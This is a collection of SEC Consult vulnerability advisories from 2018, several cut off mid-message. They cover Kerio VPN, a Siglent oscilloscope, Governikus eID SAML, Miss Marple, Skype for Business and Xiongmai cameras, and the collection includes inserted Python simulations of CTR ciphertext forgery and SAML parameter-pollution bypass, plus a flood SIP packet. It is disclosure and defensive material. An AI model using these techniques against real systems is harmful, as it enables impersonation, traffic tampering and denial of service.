that the cryptographic protocol employed exhibits severe design issues.

Generally, SEC Consult strongly recommends to prefer well-established standard
cryptographic protocols rather than proprietary protocols wherever possible
(e.g. DTLS, IPsec). Due to their widespread use, they generally receive much
greater attention by experts. Therefore, many design issues with these protocols
have already been detected and mitigated since.

We therefore recommend businesses to switch from Kerio's proprietary VPN
protocol to a standard protocol (Kerio Control e.g. supports IPsec).

Note that no full audit of Kerio Control, Kerio VPN or the cryptographic
protocol has been conducted. In addition to the vulnerabilities described
here, we already identified critical vulnerabilities in Kerio Control in 2016.
Hence we suspect there are more major security deficiencies in the product.
We therefore recommend GFI software to greatly increase the efforts towards
product security in order to keep customers secure.

We want to explicitly thank GFI for the professional handling of the
communication during this whole process.


Vulnerability overview/description:
---
After a TLS connection is established between the Kerio VPN client and the
Kerio Control appliance and cryptographic keys have been securely transferred
over this connection, the data sent through the VPN is transmitted in UDP
packets. Each of these packets is encrypted using Blowfish in CTR mode.

As this mode does not provide data authenticity, encrypted data that is modified
by an attacker results in predictable modification of the plaintext. More
precisely, bits that are flipped in the ciphertext result in the same bits being
flipped in the plaintext after decryption.

Each encrypted UDP datagram contains a simple checksum (the same checksum used
by IPv4). Assuming an attacker knows the plaintext data of a datagram and is
able to modify its ciphertext, it is trivial to change parts of the message,
e.g. inject content into the encrypted stream, while keeping the resulting
checksum identical.
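The malleability described above, as an added simulation that is not SEC Consult's withheld exploit script: a CTR-encrypted datagram carrying an RFC 1071 (IPv4-style) checksum is rewritten by an attacker who knows its plaintext but not the key, with the checksum kept identical by adjusting one known word, and the same forgery is then rejected once the datagram carries a MAC. The frame layout, the SHA-256-based keystream standing in for Blowfish-CTR, and all keys are constructed for the example.

```python
"""CTR malleability with checksum preservation, simulated. Added example;
frame layout, keystream and keys are constructed, not Kerio's protocol."""
import hashlib
import hmac

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def ctr_keystream(key, nonce, length):
    # SHA-256(key || nonce || counter) blocks: same XOR structure as Blowfish-CTR.
    out, counter = bytearray(), 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:length])

def ctr_crypt(key, nonce, data):
    return _xor(data, ctr_keystream(key, nonce, len(data)))

def _ones_complement_sum(data):
    if len(data) % 2:
        data += b"\0"
    total = sum(int.from_bytes(data[i:i + 2], "big") for i in range(0, len(data), 2))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total

def internet_checksum(data):
    """RFC 1071 checksum, as used by IPv4 headers."""
    return (~_ones_complement_sum(data)) & 0xFFFF

# Constructed layout: seq(2) | reserved(2) | checksum(2) | payload
def build_frame(seq, payload, reserved=0):
    header = seq.to_bytes(2, "big") + reserved.to_bytes(2, "big") + b"\0\0"
    return header[:4] + internet_checksum(header + payload).to_bytes(2, "big") + payload

def frame_ok(frame):
    # A frame including its own checksum sums to 0xFFFF, whose complement is 0.
    return internet_checksum(frame) == 0

def forge_frame(ciphertext, known_plain, new_payload, comp_off=2):
    """Attacker side: no key, but the plaintext is known. Flipping ciphertext
    bits flips the same plaintext bits; the 'reserved' word at comp_off absorbs
    the change in the ones'-complement sum so the checksum field stays valid."""
    assert len(new_payload) == len(known_plain) - 6, "XOR cannot change length"
    new_plain = bytearray(known_plain)
    new_plain[6:] = new_payload
    delta = (_ones_complement_sum(known_plain)
             - _ones_complement_sum(bytes(new_plain))) % 0xFFFF
    comp_old = int.from_bytes(known_plain[comp_off:comp_off + 2], "big")
    for comp_new in ((comp_old + delta) % 0xFFFF, 0xFFFF):  # 0 and 0xFFFF coincide
        new_plain[comp_off:comp_off + 2] = comp_new.to_bytes(2, "big")
        if frame_ok(bytes(new_plain)):
            break
    else:
        raise RuntimeError("could not compensate checksum")
    return _xor(ciphertext, _xor(known_plain, bytes(new_plain)))

def seal(enc_key, mac_key, nonce, frame):
    """Encrypt-then-MAC: what an integrity-protected datagram would need."""
    ct = ctr_crypt(enc_key, nonce, frame)
    return ct + hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()

def open_sealed(enc_key, mac_key, nonce, sealed):
    ct, tag = sealed[:-32], sealed[-32:]
    if not hmac.compare_digest(tag, hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()):
        return None                         # tampering detected before decryption
    return ctr_crypt(enc_key, nonce, ct)

def demo():
    enc_key, mac_key, nonce = b"constructed-enc-key", b"constructed-mac-key", b"nonce-01"
    frame = build_frame(7, b"GET /index.html HTTP/1.0\r\n")
    forged = b"GET /admin.html HTTP/1.0\r\n"    # same length as the original
    ct = ctr_crypt(enc_key, nonce, frame)
    received = ctr_crypt(enc_key, nonce, forge_frame(ct, frame, forged))
    sealed = seal(enc_key, mac_key, nonce, frame)
    tampered = forge_frame(sealed[:-32], frame, forged) + sealed[-32:]
    return received, frame_ok(received), open_sealed(enc_key, mac_key, nonce, tampered)

if __name__ == "__main__":
    print(*demo())
```

The receiver of the unauthenticated frame sees the attacker's payload with the original sequence number and an unchanged, still-valid checksum; the compensation word is the only other byte pair that differs. The checksum is linear, so any known word the receiver ignores can absorb the difference, which is why a checksum cannot substitute for a MAC.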


Proof of concept:
-
SEC Consult provided a proof of concept exploit script to GFI but it has been
removed from this advisory in order to give customers more time to upgrade the
infrastructure.


Vulnerable / tested versions:
-
The version 9.2.7 build 2921 was found to be vulnerable. This version was the
latest at the time of discovery and older versions are affected as well.


Vendor contact timeline:

2018-10-17: Creating support case at https://gfisoftware.force.com, asking for
security contact
2018-10-17: GFI support: Asking to upload advisory to support portal
2018-10-19: Uploading advisory
2018-10-22: GFI support: Escalated to engineers to further investigate
2018-10-25: GFI support acknowledges vulnerability
2018-11-08: GFI support: Beta version with patch available (with AES 128)
2018-11-09: Asking for release date of the patch
2018-11-12: GF

SEC Consult SA-20181130-0 :: Multiple Vulnerabilities in Siglent Technologies SDS 1202X-E Digital Oscilloscope

2018-12-02 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20181130-0 >
===
  title: Multiple Vulnerabilities
product: Siglent Technologies SDS 1202X-E Digital Oscilloscope
 vulnerable version: V5.1.3.13
  fixed version: -
 CVE number: -
 impact: High
   homepage: http://siglenteu.com/
 https://www.siglent.eu/
 https://www.siglentamerica.com/
  found: 2018-08-06
 by: T. Weber (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"SIGLENT is an international high-tech company, concentrating on R, sales,
production and services of measurement products. As an ISO9001:2000
International Quality Management System and ISO 14001:2004 Environmental
Management System Certified company, SIGLENT is also a member of the China
Electronic Instrument Industry Association and Guangdong Instrument
Representative Association.
[...]
SIGLENT focuses on the electronic test & measurement instrument industry and
sees research & development as a core competency, while keeping a strong
competitive edge through technology innovation and strict quality control. Try
a Siglent product. Then compare the performance and the features to any other
model, any other brand. Then compare the price. We believe there is no better
value anyplace."

Source: http://www.siglenteu.com/about.aspx


Business recommendation:

The identified backdoor accounts are accessible through Telnet, hence a
compromise of the device via a local network attack is possible.

Any malicious modification of measurement values may have serious impact on the
product or service which is created or offered by using this oscilloscope.
Therefore, all procedures which are executed with this device are untrustworthy.

SEC Consult recommends not to use this product within a network of a production
environment until a thorough security review has been performed by security
professionals and all identified issues have been resolved.

The vendor was unresponsive and did not provide a patch.


Vulnerability overview/description:
---
1) Hardcoded Backdoor Accounts
Two backdoor accounts are present on the system. A Telnet service is listening
on port 23 which enables an attacker to connect as root to the oscilloscope via
LAN.

The password hashes are hardcoded and are difficult to change for the end user
because the "shadow" file is stored on a cramfs (read-only) file system.


2) Missing Authentication / Design Issue
The software "EasyScopeX" can be used from any computer in the network to
configure and interact with the oscilloscope. This is possible without prior
authentication which enables everyone to change settings on the oscilloscope.


3) Unencrypted Communication
The software "EasyScopeX" communicates via unencrypted TCP packets with the
client computer / oscilloscope.


4) Outdated and Vulnerable Software Components
Multiple software components embedded in the firmware are outdated and found
to be vulnerable to various publicly known security issues.


Proof of concept:
-
1) Hardcoded Backdoor Accounts
The following password hashes were dumped from "/etc/shadow" by connecting to
the UART interface on the PCB:

root
siglent
(The password hashes have been removed from this advisory)


2) Missing Authentication / Design Issue
It is sufficient to install the "EasyScopeX" software and control the
oscilloscope without any authentication.


3) Unencrypted Communication
The software "EasyScopeX" communicates in plaintext via various ports by using
the portmapper. The default ports are "5024" and "5025".


4) Outdated and Vulnerable Software Components
Using the IoT Inspector software we found the following outdated and vulnerable
components:
* BusyBox 1.20.1
* GNU glibc 2.13
* Linux Kernel 3.19.0


Vulnerable / tested versions:
-
The following device / firmware version has been tested:
* Siglent SDS1202X-E (V5.1.3.13)

It is assumed that other firmware versions are affected as well.


Vendor contact timeline:

2018-08-22: Contacting German VDE CERT for coordination support
2018-09-04: Asking for a status update from the vendor
2018-09-05: VDE CERT: no response from vendor yet
2018-09-12: US sales person from Siglent has answered, VDE CERT
is sending advisory to be forwarded to engineering
2018-10-10: Asking for a status update (affected versions, etc)
2018-10-10

SEC Consult SA-20181121-0 :: Signature Bypass / Authentication Bypass in Governikus Autent SDK

2018-11-21 Thread SEC Consult Vulnerability Lab
An additional blog post has been published on this topic as well:

English version: https://r.sec-consult.com/governikus

German version: https://r.sec-consult.com/gov


 SEC Consult Vulnerability Lab Security Advisory < 20181121-0 >
===
  title: Signature Bypass / Authentication Bypass
product: Governikus Autent SDK
 vulnerable version: <=3.8.1
  fixed version: 3.8.1.2
 CVE number: -
 impact: critical
   homepage: https://www.governikus.de/
  found: 2018-06
 by: W. Ettlinger (Office Vienna)
     SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
German original, translated to English: "In the course of digitization,
electronic identities have become indispensable. At the same time, the
requirements for protection, handling with regard to legal security and the
federation of electronic identities are increasing. With Governikus Autent,
server and client components are available to ensure authentication through
electronic identities. Governikus Autent meets all the requirements of a modern
identity management solution."

Source:
https://www.governikus.de/produkte-loesungen/governikus-autent-und-ausweisapp2/


Business recommendation:

During a short crash test SEC Consult identified a critical vulnerability in the
Governikus Autent SDK nPA authentication code (German id card authentication).

This vulnerability could allow an attacker to impersonate any German citizen
on a vulnerable web application.

SEC Consult recommends to immediately apply the workaround described below or
apply the patch provided by the vendor. Moreover, SEC Consult recommends web
application providers to check historic log files for evidence of this attack.
SEC Consult recommends conducting a thorough source code security review on
the Governikus Autent components as they are integral for the security of many
web applications.


Vulnerability overview/description:
---
The software component tested is used by web applications to integrate nPA
authentication (authentication using the German official id document).

As the last step of an authentication transaction, the web application the user
authenticates against receives a string containing all relevant data about the
citizen (e.g. first name, last name). As this string is signed by a trusted
party (an eID server), the application can verify the authenticity of this
string.

The component in the web application that is supposed to verify this signature
can be tricked into accepting a string that has been modified. An attacker that
has acquired a single legitimately signed string can use this to authenticate
as any German citizen to any web application that trusts the eID server's
signature. An attacker could acquire such a signed string by hosting a web
application and tricking a victim to authenticate, by gaining access to a
signed string sent to a legitimate web application (man-in-the-middle attack,
getting access to the access log) or by authenticating against a web application
using his own id document.


Proof of concept:
-
1. Signature Bypass

During the last step of the nPA transaction, the user is redirected to the
SAML receiver of the web application she tried to authenticate against. The SAML
response is sent as a URL parameter:

https://<web application>/<SAML receiver>?SAMLResponse=<...>

According to the demo application, the first verification a SAML receiver is
meant to do is call the method HttpRedirectUtils.checkQueryString passing the
query string (as it is returned by request.getQueryString()). If this method
returns false, the signature could not be verified.

This method internally deconstructs the query string into individual parameters,
reconstructs the query string and then verifies the signature.

If however, the query string contains multiple parameters of the same name, only
the last occurrence of a parameter is built into the query string the signature
is verified against. Therefore, if a query string is constructed like following,
the first SAML response is ignored during signature verification:

...?SAMLResponse=<attacker-modified response>&SAMLResponse=<legitimately signed response>

Afterwards, when the SAML response is processed, the application is likely to
use the method ServletRequest.getParameter() to retrieve the SAML response (the
demo application which is meant to show the integration of the library also
does this). As per the specification of this method, the application server is
supposed to return the first parameter value, if multiple parameters with the
same name were sent.

Thus, the signature is verified against t
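The duplicate-parameter mismatch described above, as an added simulation that is not the Governikus SDK's code: a verifier that deconstructs the query string into a name-to-value map, so the last SAMLResponse wins, beside a getParameter() that returns the first one, plus a hardened check that rejects repeated parameter names and verifies the signature over the raw query string. HMAC-SHA256 stands in for the eID server's signature scheme; the key, the Signature parameter name and the response values are constructed for the example.

```python
"""Parameter-pollution signature bypass, simulated. Added example; HMAC and all
parameter values are constructed stand-ins, not the SDK's implementation."""
import hashlib
import hmac
from urllib.parse import parse_qsl, urlencode

def issue_signed_query(key, saml_response):
    """Stand-in for the eID server: signs the query string it redirects with."""
    body = urlencode({"SAMLResponse": saml_response})
    signature = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return body + "&Signature=" + signature

def vulnerable_check_query_string(key, query):
    """Models the behaviour described above: split into parameters, rebuild the
    query string from a map, then verify. A repeated name silently overwrites."""
    params, signature = {}, None
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name == "Signature":
            signature = value
        else:
            params[name] = value            # last occurrence wins
    rebuilt = urlencode(params)
    expected = hmac.new(key, rebuilt.encode(), hashlib.sha256).hexdigest()
    return signature is not None and hmac.compare_digest(signature, expected)

def servlet_get_parameter(query, name):
    """ServletRequest.getParameter() semantics: first occurrence wins."""
    for param, value in parse_qsl(query, keep_blank_values=True):
        if param == name:
            return value
    return None

def hardened_check_query_string(key, query):
    """Added hardening (not the vendor's fix): reject any repeated parameter and
    verify the signature over the query string exactly as received."""
    names = [name for name, _ in parse_qsl(query, keep_blank_values=True)]
    if len(names) != len(set(names)):
        return False
    body, sep, signature = query.rpartition("&Signature=")
    if not sep:
        return False
    expected = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(signature, expected)

def attack():
    # Constructed data: one legitimately signed response and the attacker's forgery.
    key = b"constructed-eid-server-key"
    legitimate = "response-for-citizen-erika-mustermann"
    forged = "response-for-citizen-max-mustermann"
    signed = issue_signed_query(key, legitimate)
    polluted = urlencode({"SAMLResponse": forged}) + "&" + signed
    return {
        "signed_query": signed,
        "polluted_query": polluted,
        "vulnerable_accepts": vulnerable_check_query_string(key, polluted),
        "app_sees": servlet_get_parameter(polluted, "SAMLResponse"),
        "hardened_accepts": hardened_check_query_string(key, polluted),
        "hardened_accepts_legit": hardened_check_query_string(key, signed),
    }

if __name__ == "__main__":
    for item in attack().items():
        print("%s: %s" % item)
```

The vulnerable verifier accepts the polluted query because the rebuilt string is byte-identical to what the eID server signed, while the application then acts on the first, unsigned SAMLResponse. Verifying what was actually received, and refusing ambiguous input outright, removes the gap between the two parsers.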

SEC Consult SA-20181116-0 :: Multiple critical vulnerabilities in Miss Marple Enterprise Edition

2018-11-21 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20181116-0 >
===
  title: Multiple critical vulnerabilities
product: Miss Marple Enterprise Edition
 vulnerable version: <2.0
  fixed version: 2.0
 CVE number: CVE-2018-19233, CVE-2018-19234
 impact: Critical
   homepage: www.comparex-group.com
  found: 2018-05-29
 by: Marius Schwarz (Office Munich)
     SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"As a global IT company with thirty years of experience, COMPAREX is one of the
world’s leading IT service providers and no. 1 software license management
company in the EMEA markets. COMPAREX develops innovative services that support
management and leverage software products, leading to an overall improvement
of workforce productivity. COMPAREX serves corporate customers spanning from
small businesses to large international corporations as well as the public
institutions supporting every customer during their digital journey towards
productivity optimization. The portfolio has a solid foundation in license
management, software procurement and cloud services. Substantial professional
and managed services complete the portfolio to support customers with services
tailored to their business demands."

Source: https://comparexusa.com/about-us/about/


Business recommendation:

The vendor provides a patch and users of this product are urged to
immediately upgrade to the latest version available.


Vulnerability overview/description:
---
Application overview:
Miss Marple is an inventory software that consists of a client and a server
part. The client (agent) is gathering system information and uploads the
results to a remote server in an encrypted ZIP file.

1) Hardcoded AES key (CVE-2018-19233)
A username and an encrypted password were identified in the Miss Marple
Inventory Agent configuration file. By decompiling the binary, the encryption
method was identified as AES-256 with a hardcoded key and initialization vector.
The credentials are used to deploy the inventory files to a remote server.


2) Uploading arbitrary files
There are two ways an attacker can upload arbitrary files to the server.

2.1) Patching the application binary to bypass the ZIP file extension check

Using this method, it is possible to upload any file to the server, even if
the credentials are unknown to the attacker! This works because every file in
a specific directory gets uploaded, as long as the file has the correct file
extension. This can be bypassed because the file extension is only checked on
the client side and not on the server side. Patching the binary is done by
replacing the extension string in the MMIA.exe binary itself with the file
extension of the attacker's file, e.g. ".aspx".

2.2) Using cURL to upload arbitrary files

If the credentials are known to the attacker, it is possible to use tools like
cURL to upload arbitrary files to the remote server.

Both ways can be used by an attacker to upload a web-shell to the server and
execute arbitrary commands.


3) Missing update validation (CVE-2018-19234)
Besides the Miss Marple Inventory Agent, a Miss Marple Updater Service is
running on all clients. This service checks for new versions on the same server.
If files are uploaded to the right directory on the server, the updater
downloads and executes them with the highest privileges (NT Authority\SYSTEM)
without validating the binaries.
This can also be used for escalating privileges on the client. By uploading a
web shell using the methods described in vulnerability 2, an attacker gets
sufficient write permissions to access the update directory and to place
malicious files on the server. This will execute arbitrary code on all clients
using Miss Marple.


Proof of concept:
-
1) Hardcoded AES key (CVE-2018-19233)
No proof of concept will be provided.

2) Uploading arbitrary files
2.1) No proof of concept will be provided. E.g. the Unicode string for ".zip"
just has to be replaced with the file extension for the uploaded web shell.

2.2) Using cURL to upload arbitrary files
It is possible to upload arbitrary files using cURL and the credentials obtained
in 1).

3) Missing update validation (CVE-2018-19234)
No proof of concept will be provided.


Vulnerable / tested versions:
-
The following versions have been tested and found to be vulnerable:

Miss Marple Inventory Agent / Miss Marple Updater Service 1.13


Vendor contact timeline:

2018-06-

SEC Consult SA-20181114-0 :: Denial of Service in Microsoft Skype for Business

2018-11-21 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20181114-0 >
===
  title: Denial of Service
product: Microsoft Skype for Business 2016 / Lync 2013
 vulnerable version: Microsoft Skype for Business 2015 (Lync 2013) before
 v15.0.5075.1000
 Skype for Business 2016: before v16.0.4756.1000
  fixed version: Microsoft Skype for Business 2015 (Lync 2013) 
v15.0.5075.1000
 Skype for Business 2016 v16.0.4756.1000
 CVE number: CVE-2018-8546
 impact: Medium
   homepage: https://www.skype.com/en/business/
  found: 08/2018
 by: Sabine Degen (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"Skype for Business (formerly Microsoft Office Communicator and Microsoft
Lync) is an instant messaging client used with Skype for Business Server or
with Skype for Business Online (available with Microsoft Office 365).
Skype for Business is enterprise software."

Source: https://en.wikipedia.org/wiki/Skype_for_Business


Business recommendation:

Assess the impact of this vulnerability on your business. The patch
provided by Microsoft should be installed immediately. Especially if
Skype for Business is being used for external communication.


Vulnerability overview/description:
---
A large number of emojis (e.g. ~800 kittens) received in one message by the
Skype for Business client freezes the program for a few seconds. This can be
exploited to perform denial of service attacks against Skype for Business
users and compromises the availability of the program.

For example, an attacker can continuously send such messages to the chat
window of a meeting room in order to freeze the program for all participants
and prevent them from using the chat or seeing the video.

Note that the audio and video streams are handled by a separate thread and are
therefore not affected; only the functions related to the graphical user
interface become unusable.


Proof of concept:
-
After sending a big amount of emojis (~800 kittens) to a Skype for Business
chat, the program freezes for a few seconds while rendering the chat window.
Continuously sending emojis will make the GUI unusable for the user.
Ongoing conference calls are not affected or interrupted.

The following SIP packet illustrates the attack.

MESSAGE sip:xxx@*redacted*;opaque=user:epid:EwWlc9DdAFGQtozR4vBibAAA;gruu SIP/2.0
Via: SIP/2.0/tls 127.0.0.1:7490
From: ;tag=82254700;epid=e67b0162bec8
To: ;tag=5c302cb624;epid=15347556e6
Max-Forwards: 70
CSeq: 12 MESSAGE
User-Agent: Purple/2.12.0 Sipe/1.23.2 (win-i386; RTC/5.0)
Call-ID: 440Eg2C92a5C4Ci0A43m5DDAt76CEb3DEAx13B0x
Route:

Contact: 

Content-Type: text/plain;
charset=UTF-8;msgr=WAAtAE0ATQBTAC0ASQBNAC0ARgBvAHIAbQBhAHQAOgAgAEYATgA9AE0AUwAlADIAMABTAGEAbgBzACUAMgAwAFMAZQByAGkAZgA7ACAARQBGAD0AOwAgAEMATwA9ADAAOwAgAFAARgA9ADAAOwAgAFIATAA9ADAADQAKAA0ACgA
Content-Length: 4420
Authorization: TLS-DSK qop="auth", opaque="174C6224", realm="SIP Communications
Service", targetname="*redacted*", crand="1126134f", cnum="29", 
response="*redacted*"

(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)
(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)
(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)
(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)
(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat) [...]
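Because the attack is a flood of emoticon tokens rather than a malformed packet, it is a natural candidate for detection at a SIP proxy, an SBC or in chat logs. The following Python code is an added example (not part of the advisory and not Microsoft code): it parses a SIP MESSAGE request, counts emoticon tokens in a text/plain body and flags both a single oversized message and a sustained flood from one sender, which covers the "continuously send" variant the advisory describes. The sample messages, the emoticon syntax approximation and the thresholds are constructed assumptions for illustration.

```python
import re
from collections import defaultdict, deque

# Constructed samples modelled on the SIP MESSAGE in the advisory; headers are
# abbreviated and the parties replaced by placeholders.
FLOOD_MESSAGE = (
    "MESSAGE sip:victim@example.invalid SIP/2.0\r\n"
    "Via: SIP/2.0/tls 127.0.0.1:7490\r\n"
    "From: <sip:attacker@example.invalid>;tag=82254700\r\n"
    "To: <sip:victim@example.invalid>;tag=5c302cb624\r\n"
    "CSeq: 12 MESSAGE\r\n"
    "Content-Type: text/plain; charset=UTF-8\r\n"
    "\r\n"
    + "(cat)" * 800
)

BENIGN_MESSAGE = (
    "MESSAGE sip:victim@example.invalid SIP/2.0\r\n"
    "From: <sip:colleague@example.invalid>;tag=1\r\n"
    "Content-Type: text/plain; charset=UTF-8\r\n"
    "\r\n"
    "see you at 10 (smile)"
)

# Skype for Business emoticons are typed as a short name in parentheses, e.g.
# "(cat)".  This pattern is an approximation of that syntax (assumption).
EMOTICON_RE = re.compile(r"\([a-z]{1,16}\)", re.IGNORECASE)

# Thresholds are assumptions for this example; tune them to what normal chat
# traffic looks like in your environment.
PER_MESSAGE_LIMIT = 100     # emoticons in a single message
PER_SENDER_LIMIT = 400      # emoticons from one sender within WINDOW_SECONDS
WINDOW_SECONDS = 30.0


def parse_sip_request(raw):
    """Split a SIP request into (method, {lower-cased header: value}, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method = lines[0].split(" ", 1)[0]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, headers, body


def sender_of(headers):
    """Return the From URI without its ;tag parameter and angle brackets."""
    return headers.get("from", "").split(";", 1)[0].strip("<> ")


def emoticon_count(raw):
    """Number of emoticon tokens in a text/plain MESSAGE body (0 otherwise)."""
    method, headers, body = parse_sip_request(raw)
    if method != "MESSAGE":
        return 0
    if not headers.get("content-type", "").lower().startswith("text/plain"):
        return 0
    return len(EMOTICON_RE.findall(body))


class EmoticonFloodDetector:
    """Flags a single oversized message and a sustained flood from one sender.

    The second check matters because the attack in the advisory is continuous:
    many medium-sized messages freeze the client just as well as one huge one.
    """

    def __init__(self, per_message=PER_MESSAGE_LIMIT,
                 per_sender=PER_SENDER_LIMIT, window=WINDOW_SECONDS):
        self.per_message = per_message
        self.per_sender = per_sender
        self.window = window
        self._history = defaultdict(deque)  # sender -> deque of (time, count)

    def observe(self, raw, now):
        """Return 'ok', 'flood:single-message' or 'flood:sustained' for one
        request seen at time `now` (seconds on any monotonic clock)."""
        count = emoticon_count(raw)
        if count >= self.per_message:
            return "flood:single-message"
        _, headers, _ = parse_sip_request(raw)
        history = self._history[sender_of(headers)]
        history.append((now, count))
        while history and now - history[0][0] > self.window:
            history.popleft()
        if sum(c for _, c in history) >= self.per_sender:
            return "flood:sustained"
        return "ok"


if __name__ == "__main__":
    detector = EmoticonFloodDetector()
    print(emoticon_count(FLOOD_MESSAGE), detector.observe(FLOOD_MESSAGE, 0.0))
    print(emoticon_count(BENIGN_MESSAGE), detector.observe(BENIGN_MESSAGE, 1.0))
```

A verdict other than "ok" is the point at which a proxy would drop or truncate the message, or at which a meeting organiser would be alerted; the vendor's suggested workaround (blocking the user) only helps once the sender has been identified, which is what the per-sender history provides.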


Vulnerable / tested versions:
-
The following versions have been identified as vulnerable which were
the latest versions available at the time of the test:

* Lync 2013 (15.0) 64-Bit part of Microsoft Office Professional Plus 2013
* Skype for Business 2016 MSO (16.0.93).64-Bit,

Both versions were running on Windows 10 Pro.

According to the vendor, all previous versions are affected:
* Skype for Business 2015 (Lync 2013) before v15.0.5075.1000
* Skype for Business 2016: before v16.0.4756.1000


Vendor contact timeline:

2018-08-02: Vulnerability details submitted to Microsoft,
MSRC Case 47060 assigned
2018-08-28: Asking for a status update
2018-08-30: Vendor: issue has been reproduced, solution to block the user
provided
2018-08-31: Follow-up questions why DoS is not categorized as security issue
as the provided workaround is not effective for attacks already
in progress
2018-08-31: Vendor: decided to f

SEC Consult SA-20181009-0 :: Remote Code Execution via XMeye P2P Cloud in Xiongmai IP Cameras, NVRs and DVRs incl. 3rd party OEM devices (CVE-2018-17915, CVE-2018-17917, CVE-2018-17919)

2018-10-09 Thread SEC Consult Vulnerability Lab
SEC Consult also published a blog post regarding the identified security issues
with further background information:

Blog: https://r.sec-consult.com/xmeye


SEC Consult Vulnerability Lab Security Advisory < 20181009-0 >
===
  title: Remote Code Execution via XMeye P2P Cloud
product: Xiongmai IP Cameras, NVRs and DVRs
 incl. 3rd party OEM devices
 vulnerable version: see below
  fixed version: -
 CVE number: CVE-2018-17915, CVE-2018-17917, CVE-2018-17919
 impact: Critical
   homepage: http://www.xiongmaitech.com/en/
  found: 2018-03-05
 by: Stefan Viehböck (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"Hangzhou Xiongmai Technology Co., Ltd concentrates on security surveillance,
Video intelligent research and development. We devote ourselves to
providing good products, technical services for manufacturers,
wholesaler and service provider, in order to offer better experience
for our customers. We are global leading providers in security video
products and technology. Established from 2009, many years development,
the headquarter of XM locate in Yinhu Innovation Center, Fuyang
district, Hangzhou now. Total registered capital reach to 60 million.
Now we owns nearly 2000 employees including a strong R&D team (more
than 300 experienced engineers)."

Source: http://www.xiongmaitech.com/en/index.php/about/company/18


Business recommendation:

SEC Consult has identified highly critical vulnerabilities in Xiongmai
products and the "XMeye P2P Cloud" feature which is being used in many
3rd party OEM devices as well.

The vendor does not provide proper mitigations and hence it is recommended
not to use any products associated with the XMeye P2P Cloud until
all of the identified security issues have been fixed and a thorough
security analysis has been performed by professionals.


Vulnerability overview/description:
---
1) Predictable XMEye Cloud IDs (CVE-2018-17915)
All Xiongmai devices come with a feature called "XMeye P2P Cloud". It is a
proprietary, UDP-based protocol that allows users to access their IP cameras or
NVRs/DVRs via the internet. The feature is enabled by default, no setup by the
user is required.

The device initiates and keeps a connection to a Xiongmai cloud server.
All connections between clients and the devices are established via Xiongmai
cloud servers. This approach allows users to connect to devices that are behind
firewalls, NATed etc.

The unique, per-device identifier is the cloud ID. It is a 16 character long
hexadecimal string (e.g. f7e708f21de0fde0).

Anyone who knows the device identifier and the admin credentials can establish a
connection to a device using the XMEye apps (Android, iOS) or a "VMS" desktop
application.

The Cloud ID may be unique, but it is not random. It is derived (at boot time)
from the device MAC address using a few simple operations (see
get_sn_from_mac() below).

An attacker can enumerate potential MACs/cloud IDs, find valid ones and then
use the weak default credentials to log in. This allows the attacker to
watch the video feed, change the device configuration and possibly gain remote
code execution using other vulnerabilities.

The XMEye functionality allows an attacker to attack devices that are behind
firewalls, NATed networks etc.

MAC addresses have a well-defined structure: 3-octet OUI (vendor) + 3-octet NIC ID.
OUIs are assigned by the IEEE. Interestingly, Xiongmai does not own an OUI, but
instead uses the OUIs of other companies.

The following OUIs are used by Xiongmai devices (OUIs based on internet
research and scanning, company names based on [1]):
001210 WideRay Corp
001211 Protechna Herbst GmbH & Co. KG
001212 PLUS Corporation
001213 Metrohm AG
001214 Koenig & Bauer AG
001215 iStor Networks, Inc. 
001216 ICP Internet Communication Payment AG
001217 Cisco-Linksys, LLC
001218 ARUZE Corporation
003E0B - Not assigned


We developed a cloud ID scanner that queries the Xiongmai cloud server. The
responses indicate if there is a device online that uses the given cloud ID,
plus provide the IP of a Xiongmai Cloud hop server that is geographically
close to the device. One query is one UDP packet.

We scanned 0.02% of the address space (randomly chosen) in each OUI range
(2^24, about 16.8 million possible NIC IDs per range) and extrapolated the
results.

OUI: 001210; IDs checked 3,365;  Devices online 3; Success rate: 0.1%;
extrapolated devices online: 14,957
OUI: 001211; IDs checked 3,363;  Devices online 9; Success rate:

SEC Consult SA-20181001-0 :: Password disclosure vulnerability & XSS in PTC ThingWorx (CVE-2018-17216, CVE-2018-17217, CVE-2018-17218)

2018-10-02 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20181001-0 >
===
  title: Password disclosure vulnerability & XSS
product: PTC ThingWorx
 vulnerable version: 6.5-7.4, 8.0.x, 8.1.x, 8.2.x
  fixed version: see Solution section
